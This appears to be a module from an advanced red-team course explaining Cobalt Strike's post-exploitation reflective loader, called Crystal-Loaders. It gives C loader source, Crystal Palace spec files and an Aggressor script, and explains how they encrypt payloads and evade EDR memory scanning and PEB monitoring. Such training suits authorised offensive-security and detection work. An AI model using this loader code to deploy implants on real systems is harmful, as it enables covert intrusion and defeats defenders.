Difficulty: Advanced

Module 7: Post-Ex UDRL & Aggressor Integration

The postex loader, $GMH/$GPA patching, string-based DFR, Aggressor hooks, and the complete build pipeline from C source to deployed Beacon.

Module Objective

Understand how Cobalt Strike's post-exploitation DLLs are loaded by a separate, simplified UDRL. You will learn how the postex loader differs from the Beacon UDRL, how it receives API resolution capabilities from its parent Beacon via $GMH/$GPA patching, and how the Aggressor script ties the entire Crystal-Loaders system together. By the end of this module you will be able to trace a complete payload from C source through Crystal Palace to a running Beacon on target.

1. What Is Post-Ex?

Cobalt Strike's post-exploitation capabilities — mimikatz, screenshot, keylogger, port scan, hashdump, net commands, and many others — are implemented as standalone DLLs. When an operator runs one of these commands through the Beacon console, Cobalt Strike compiles or selects the appropriate postex DLL and sends it to the running Beacon for execution.

These postex DLLs need their own loader. The initial Beacon UDRL (covered in Modules 5 and 6) loads the Beacon implant itself, but every subsequent postex capability that arrives as a DLL also needs to be reflectively loaded into memory. Cobalt Strike provides a dedicated hook for this purpose: POSTEX_RDLL_GENERATE.

Why a Separate Loader?

The postex loader is architecturally simpler than the Beacon UDRL because it operates in a fundamentally different context. The Beacon is already running, API resolution is already solved, syscall stubs are already resolved, and the BUD (Beacon User Data) is already populated. The postex loader does not need to bootstrap any of this infrastructure — it inherits resolution capabilities from its parent Beacon via function pointer patching.

Key Distinction

The POSTEX_RDLL_GENERATE Aggressor hook allows operators to replace the default postex loader with a custom one — just as BEACON_RDLL_GENERATE allows replacing the Beacon's own loader. Crystal-Loaders provides both: a full-featured Beacon UDRL and a streamlined postex UDRL, each with its own spec file and C source.

2. Key Differences from the Beacon UDRL

The postex loader shares the same Crystal Palace build system and LibTCG PE loading primitives as the Beacon UDRL, but it strips away everything that the parent Beacon already provides. The following table highlights every architectural difference:

Aspect	Beacon UDRL (loader.c)	Post-Ex UDRL (loader.c)
Includes	`beacon.h`, `gate.h`, `tcg.h`	`tcg.h` only
Syscall resolution	Full `SYSCALL_API` via LibGate	None needed
DFR method	`ror13` (hash-based)	`strings` (ASCII name-based)
API resolution	PEB walking via `findModuleByHash`	`$GMH`/`$GPA` from parent Beacon
BUD population	Full `BEACON_USER_DATA`	None
Entry params	`go()` takes no args	`go(void* loaderArguments)`
DllMain calls	3 (BEACON_USER_DATA, ATTACH, START)	2 (ATTACH, START)
Memory tracking	`ALLOCATED_MEMORY_REGION`	`RDATA_SECTION`
Section masking	Full section tracking	`.rdata` capture only

The most striking reduction is in dependencies. The Beacon UDRL includes beacon.h (for BUD structures), gate.h (for LibGate syscalls), and tcg.h (for PE loading). The postex loader only needs tcg.h because it does not resolve syscalls and does not populate BUD. It is purely a PE loading engine with inherited API resolution.

Why This Matters for Evasion

A smaller loader means a smaller PIC blob, which means less code in memory to scan, fewer function calls to trace, and a reduced detection surface. The postex loader also avoids touching the PEB directly (it uses patched-in function pointers instead of PEB walking), which sidesteps PEB access monitoring that some EDR products implement.

3. The $GMH / $GPA Patching Mechanism

The central design question for the postex loader is: how does it resolve Windows API functions without PEB walking and without LibGate? The answer is function pointer patching. The parent Beacon already has resolved addresses for GetModuleHandleA and GetProcAddress. Crystal Palace writes those addresses directly into the postex loader's code before it executes.

Global Function Pointers in .text

The postex loader.c declares two global function pointers with an unusual attribute — they are placed in the .text section instead of .data:

C (postex/loader.c)// Global function pointers stored in .text section
__typeof__(GetModuleHandleA) * pGetModuleHandle __attribute__((section(".text")));
__typeof__(GetProcAddress)   * pGetProcAddress  __attribute__((section(".text")));

Placing them in .text is deliberate. After Crystal Palace transforms the COFF object into PIC, the .text section becomes the executable code body. By placing the pointers here, they become part of the PIC blob itself — directly addressable via RIP-relative instructions. If they were in .data, Crystal Palace would need to handle an additional data section and relocations.

The patch Directive

The postex spec file uses Crystal Palace's patch directive to write values into these symbol locations:

loader.spec (postex)name     "Beacon Postex Loader"
describe "PIC loader for Cobalt Strike's postex DLLs"
author   "Daniel Duggan (@_RastaMouse)"

x64:
    load "bin/loader.x64.o"
        make pic +gofirst +optimize +disco
        dfr "resolve" "strings"
        patch "pGetModuleHandle" $GMH
        patch "pGetProcAddress"  $GPA
        mergelib "../libtcg.x64.zip"

    generate $KEY 128
    push $DLL
        xor $KEY
        preplen
        link "dll"
    push $KEY
        preplen
        link "key"
    export

The $GMH and $GPA variables are not defined in the spec itself. They are provided externally by the Aggressor script at runtime, which receives them from Cobalt Strike as parameters to the POSTEX_RDLL_GENERATE hook. Crystal Palace resolves the symbol names "pGetModuleHandle" and "pGetProcAddress" in the COFF object's symbol table and overwrites those locations with the 8-byte addresses provided by $GMH and $GPA.

$GMH / $GPA Patching Flow

Parent Beacon
has resolved GMH/GPA

→

CS Engine
passes to Aggressor hook

→

Crystal Palace
patch directive

→

PIC Blob
pointers baked in .text

Comparing Spec Directives: Beacon vs Post-Ex

Directive	Beacon Spec	Post-Ex Spec
`dfr`	`"resolve" "ror13"`	`"resolve" "strings"`
`patch`	Not used	`patch "pGetModuleHandle" $GMH` `patch "pGetProcAddress" $GPA`
`mergelib`	LibGate + LibTCG	LibTCG only

4. The Post-Ex resolve() Function

Because the postex spec uses dfr "resolve" "strings", Crystal Palace rewrites all __imp_MODULE$Function references to call resolve() with ASCII string arguments instead of ROR13 hashes. The postex resolve() function is correspondingly different from the Beacon UDRL's version:

C (postex/loader.c)char * resolve(char * module, char * function)
{
    HANDLE hModule = pGetModuleHandle(module);

    if (hModule == NULL)
        hModule = LoadLibraryA(module);

    return pGetProcAddress(hModule, function);
}

This function is deceptively simple, but every line is significant:

Line-by-Line Analysis

Line	What It Does
`pGetModuleHandle(module)`	Attempts to get a handle to the module using the patched `$GMH` pointer. This succeeds if the DLL is already loaded in the process (e.g., `kernel32.dll`, `ntdll.dll`).
`if (hModule == NULL)`	If the module is not already loaded, the function needs to load it first. This happens when postex DLLs import from less common DLLs.
`LoadLibraryA(module)`	Calls `LoadLibraryA` directly to load the module. This is available as a plain function call because it comes from `<windows.h>` and is not DFR-decorated.
`pGetProcAddress(hModule, function)`	Finally resolves the target function from the (now loaded) module and returns its address.

Comparison with Beacon UDRL resolve()

Beacon UDRL resolve()

Takes two DWORD hashes (ROR13)
Walks the PEB's InMemoryOrderModuleList
Hashes each module name, compares against moduleHash
Walks export table, hashes each function name
No dependency on any external function pointers
Fully self-contained — works from a cold start

Post-Ex resolve()

Takes two ASCII strings (module name, function name)
Calls pGetModuleHandle (patched $GMH)
Falls back to LoadLibraryA (direct call, not DFR-decorated) if module not loaded
Calls pGetProcAddress (patched $GPA)
Depends on parent Beacon's function pointers
Cannot operate independently — requires a running Beacon

5. RDATA_SECTION Tracking

The Beacon UDRL tracks all allocated memory regions via ALLOCATED_MEMORY_REGION structures in the BUD. The postex loader uses a simpler tracking mechanism: it captures only the .rdata section's location and size.

C (postex/loader.c)typedef struct {
    char * start;      // Start address of .rdata
    DWORD  length;     // Size of .rdata
    DWORD  offset;     // Offset of IAT within .rdata
} RDATA_SECTION;

Why Track .rdata?

Long-running postex DLLs — such as the keylogger, screenshot capture loop, or port scanner — persist in memory for extended periods. While they are idle between operations, their memory is vulnerable to scanning. The .rdata section is the highest-value forensic target because it contains:

What Lives in .rdata

The Import Address Table (IAT) — An array of resolved function pointers to APIs in ntdll.dll, kernel32.dll, and other system DLLs. These pointers are recognizable patterns: consecutive addresses within the same DLL's export range.
String literals — Read-only strings used by the postex DLL (error messages, format strings, registry key paths).
Virtual function tables — For C++ postex DLLs, vtable pointers reside in .rdata.
Constant data — Any const global data the compiler places in read-only sections.

By passing the RDATA_SECTION structure to the postex DLL via DllMain(DLL_PROCESS_ATTACH, &rdata), the DLL can XOR-encrypt or zero its own .rdata section while idle. When it needs to run again, it decrypts the section, performs its operation, and re-encrypts. This pattern is the postex equivalent of the sleep mask technique used by the Beacon itself.

RDATA Obfuscation Lifecycle

Postex DLL loaded
.rdata populated with IAT

→

Operation completes
keylogger cycle done

→

XOR encrypt .rdata
using RDATA_SECTION info

→

Idle (safe)
no readable IAT in memory

6. The Post-Ex go() Function

The postex go() function is the entry point of the PIC blob. Crystal Palace places it at byte offset 0 via the +gofirst flag. Unlike the Beacon UDRL's go() (which takes no arguments), the postex version receives a loaderArguments pointer from the parent Beacon:

C (postex/loader.c)void go(void * loaderArguments)
{
    RESOURCE * dll = (RESOURCE *)GETRESOURCE(_DLL_);
    RESOURCE * key = (RESOURCE *)GETRESOURCE(_KEY_);

    // XOR unmask the encrypted postex DLL
    char * src = KERNEL32$VirtualAlloc(
        NULL, dll->length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    for (DWORD i = 0; i < dll->length; i++)
        src[i] = dll->value[i] ^ key->value[i % key->length];

    // Parse the decrypted PE
    DLLDATA data;
    ParseDLL(src, &data);

    // Allocate and load sections
    IMPORTFUNCS funcs;
    DWORD size = SizeOfDLL(&data);
    char * dst = KERNEL32$VirtualAlloc(
        NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LoadDLL(&data, dst);
    ProcessImports(&funcs, &data, dst);

    // Fix permissions and capture .rdata info
    RDATA_SECTION rdata;
    FixSectionPermissions(&data, dst, &rdata);

    // Get entry point and clean up decryption buffer
    DLLMAIN_FUNC entryPoint = (DLLMAIN_FUNC)EntryPoint(&data, dst);
    KERNEL32$VirtualFree(src, 0, MEM_RELEASE);

    // Two DllMain calls (no USER_DATA needed)
    entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, &rdata);               // pass rdata info
    entryPoint((HINSTANCE)GETRESOURCE(go), 0x04, loaderArguments);  // start with loader args
}

Each phase of this function maps directly to a stage in the loading process:

Phase-by-Phase Breakdown

Phase	Lines	What Happens
Resource Retrieval	`GETRESOURCE`	The `_DLL_` and `_KEY_` macros resolve to named sections that Crystal Palace linked into the PIC blob. `GETRESOURCE` uses RIP-relative addressing to locate them.
XOR Decryption	`VirtualAlloc` + XOR loop	Allocates a RW buffer (`src`) and decrypts the postex DLL using a rolling XOR with the 128-byte key. The decrypted buffer is a raw PE file.
PE Parsing	`ParseDLL`	LibTCG parses the PE headers, section table, import directory, and relocation table into a `DLLDATA` structure.
Section Loading	`LoadDLL`	Allocates the final image region (RW) and copies each PE section to its correct virtual address offset.
Import Resolution	`ProcessImports`	Takes an `IMPORTFUNCS` struct, the `DLLDATA`, and `dst`. Walks the import directory and resolves each function using the DFR-rewritten `resolve()`, which delegates to the patched `$GMH`/`$GPA`.
Permission Fixing	`FixSectionPermissions`	Sets correct page protections for each section (`.text` to RX, `.rdata` to R, `.data` to RW). Captures `.rdata` boundaries into the `RDATA_SECTION` struct.
Cleanup	`VirtualFree`	Releases the temporary decryption buffer (`src`). The encrypted DLL data and XOR key are no longer needed.
DllMain #1	`DLL_PROCESS_ATTACH`	Calls the postex DLL's entry point with `(HINSTANCE)dst` and `&rdata` as the reserved parameter, giving it the information needed for .rdata obfuscation.
DllMain #2	`0x04`	Calls DllMain again with reason `0x04`, passing `(HINSTANCE)GETRESOURCE(go)` as the module handle and `loaderArguments` from the parent Beacon, starting the actual postex operation (mimikatz dump, screenshot capture, etc.).

Contrast with Beacon UDRL go()

The Beacon UDRL's go() function makes three DllMain calls:

Beacon UDRL: Three DllMain Calls

entryPoint((HINSTANCE)0, DLL_BEACON_USER_DATA, &bud) — passes the BEACON_USER_DATA structure using the special DLL_BEACON_USER_DATA reason code and (HINSTANCE)0 as the module handle
entryPoint((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL) — standard DLL initialization with the actual loaded image base
entryPoint((HINSTANCE)GETRESOURCE(go), DLL_BEACON_START, NULL) — starts the Beacon main loop

The postex loader skips the first call entirely because there is no BEACON_USER_DATA to pass. Postex DLLs do not need syscall stubs or memory region tracking — they operate within the context of an already-running Beacon that handles those concerns.

7. The Aggressor Script (crystalpalace.cna)

The Aggressor script is the glue that connects Crystal Palace to Cobalt Strike's runtime. It implements the hooks that Cobalt Strike calls when it needs to generate loader payloads, passing the appropriate parameters to the Crystal Palace linker.

Java/Sleep (crystalpalace.cna)import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;

set BEACON_RDLL_GENERATE {
    local('$spec $spec_path $result');

    // $1 = filename, $2 = beacon DLL bytes, $3 = arch
    if ($3 eq "x86") { return $null; }  // x64 only

    $spec_path = getFileProper(script_resource("udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    $result = [$spec run: $2, new HashMap];

    if (strlen($result) == 0) {
        warn("Crystal Palace: BEACON_RDLL_GENERATE failed");
        return $null;
    }

    return $result;
}

set BEACON_RDLL_SIZE {
    return "0";  // dynamic size
}

set POSTEX_RDLL_GENERATE {
    local('$spec $spec_path $hashMap $result');

    // $1 = filename, $2 = postex DLL bytes, $3 = arch
    // $4 = beacon ID, $5 = $GMH, $6 = $GPA
    if ($3 eq "x86") { return $null; }

    $spec_path = getFileProper(script_resource("postex-udrl"), "loader.spec");
    $spec = [LinkSpec Parse: $spec_path];
    $hashMap = new HashMap;
    [$hashMap put: "\$GMH", cast($5, 'b')];
    [$hashMap put: "\$GPA", cast($6, 'b')];

    $result = [$spec run: $2, $hashMap];

    if (strlen($result) == 0) {
        warn("Crystal Palace: POSTEX_RDLL_GENERATE failed");
        return $null;
    }

    return $result;
}

The three hooks each serve a distinct purpose in the payload generation pipeline. Note that in Cobalt Strike's Sleep language, the set keyword assigns named hook callbacks (such as RDLL hooks), while on registers event handlers — these are different mechanisms. The import java.util.HashMap at the top makes the Java HashMap class available for passing patch variables.

BEACON_RDLL_GENERATE

Hook: BEACON_RDLL_GENERATE

When it fires: Every time Cobalt Strike generates a Beacon payload (HTTP listener, HTTPS listener, SMB pipe, etc.).

Parameters received:

$1 — The filename hint (e.g., "beacon.dll")
$2 — The raw Beacon DLL bytes (the PE file that needs to be loaded)
$3 — The architecture string ("x86" or "x64")

What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the Beacon UDRL spec. Feeds it the Beacon DLL bytes (which become $DLL in the spec) and returns the complete PIC payload. The new HashMap is empty because the Beacon spec has no external variables to patch. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.

Return value: The final PIC shellcode blob, or $null if the architecture is x86 (Crystal-Loaders is x64-only) or if Crystal Palace fails.

BEACON_RDLL_SIZE

Hook: BEACON_RDLL_SIZE

When it fires: Before BEACON_RDLL_GENERATE, to determine how much space to reserve for the loader.

Return value: "0" indicates the loader size is dynamic. Crystal Palace determines the exact size at link time based on the code, libraries, and encrypted payload. Returning "0" tells Cobalt Strike not to pre-allocate a fixed buffer but to accept whatever size Crystal Palace produces.

POSTEX_RDLL_GENERATE

Hook: POSTEX_RDLL_GENERATE

When it fires: Every time an operator runs a postex command (mimikatz, screenshot, keylogger, etc.) that requires loading a DLL into the Beacon process.

Parameters received:

$1 — The filename hint (e.g., "mimikatz.dll")
$2 — The raw postex DLL bytes
$3 — The architecture string
$4 — The parent Beacon's ID (integer)
$5 — The parent Beacon's GetModuleHandleA address ($GMH)
$6 — The parent Beacon's GetProcAddress address ($GPA)

What it does: Uses getFileProper to construct the spec file path and calls LinkSpec Parse to load the postex spec. Constructs a HashMap containing $GMH and $GPA as byte arrays (via cast($5, 'b')), and passes both the DLL bytes and the hash map to Crystal Palace. The patch directives in the spec resolve $GMH and $GPA from this hash map. Includes error handling: if the result has strlen() == 0, a warn() fallback fires and $null is returned.

Return value: The complete postex PIC payload with patched-in function pointers, or $null on failure.

The HashMap is the Bridge

The key insight is how data flows from Cobalt Strike through Aggressor into Crystal Palace. The $GMH and $GPA values originate from the running Beacon on the target machine. Cobalt Strike resolves them from Beacon's process context, passes them as parameters to the Aggressor hook, and the script packages them into a HashMap that Crystal Palace reads when processing patch directives. By the time the PIC blob is assembled, the correct function addresses are baked directly into the shellcode's .text section.

8. The Full Build Pipeline

From writing C source code to a running Beacon on target, the Crystal-Loaders system involves eight distinct stages. The following diagram traces the complete pipeline:

Complete Crystal-Loaders Build Pipeline

1. Write C Loader — Author loader.c with go() entry point, resolve() function, and PE loading logic using LibTCG primitives.

2. Compile with MinGW — x86_64-w64-mingw32-gcc -c loader.c -o bin/loader.x64.o produces a COFF object file. The -c flag stops before linking.

3. Write Spec File — Author loader.spec defining the PIC transformation, DFR method, library merges, payload encryption, and data linking.

4. CS Triggers Hook — At runtime, Cobalt Strike fires BEACON_RDLL_GENERATE (or POSTEX_RDLL_GENERATE), passing the raw DLL bytes and architecture info to the Aggressor script.

5. Aggressor Loads Spec — The .cna script calls LinkSpec Parse to load and parse the spec file, preparing the Crystal Palace linker engine.

6. Crystal Palace Executes — The linker performs six sub-operations:

Crystal Palace Sub-Operations (Step 6)

Sub-Step	Operation	Result
6a	Load `loader.x64.o`	COFF object loaded into linker memory
6b	`make pic +gofirst +optimize +disco`	COFF transformed to PIC with `go()` at offset 0
6c	`dfr "resolve" "ror13"` (or `"strings"`)	All DLL import references rewritten to call `resolve()`
6d	`mergelib` LibGate + LibTCG (or LibTCG only)	Library code merged into the PIC blob
6e	`generate $KEY 128`	128-byte random XOR key created
6f	`push $DLL` / `xor` / `preplen` / `link`	DLL XOR-encrypted, length-prefixed, linked as named section

7. CS Wraps PIC Blob — Cobalt Strike takes the exported PIC blob and wraps it into the appropriate delivery mechanism (stager shellcode, staged payload, or raw artifact).

8. Execution on Target — The stager delivers the PIC blob to the target process. Execution begins at byte 0 (go()). The loader decrypts the embedded DLL, loads it via LibTCG, resolves imports via DFR, and calls DllMain to start Beacon.

Pipeline Summary

The pipeline transforms human-readable C code into a flat, encrypted, position-independent shellcode blob that loads a full-featured DLL implant from memory. At no point in this pipeline does a traditional PE file exist in the target process's memory. The DLL is encrypted inside the PIC blob, decrypted into a temporary buffer, loaded section-by-section into a final allocation, and the temporary buffer is freed. The only persistent artifacts are the PIC code itself (which has no PE headers) and the loaded DLL sections (which have correct per-section permissions instead of a single RWX blob).

← Prev: Beacon User Data Next: Extending Loaders →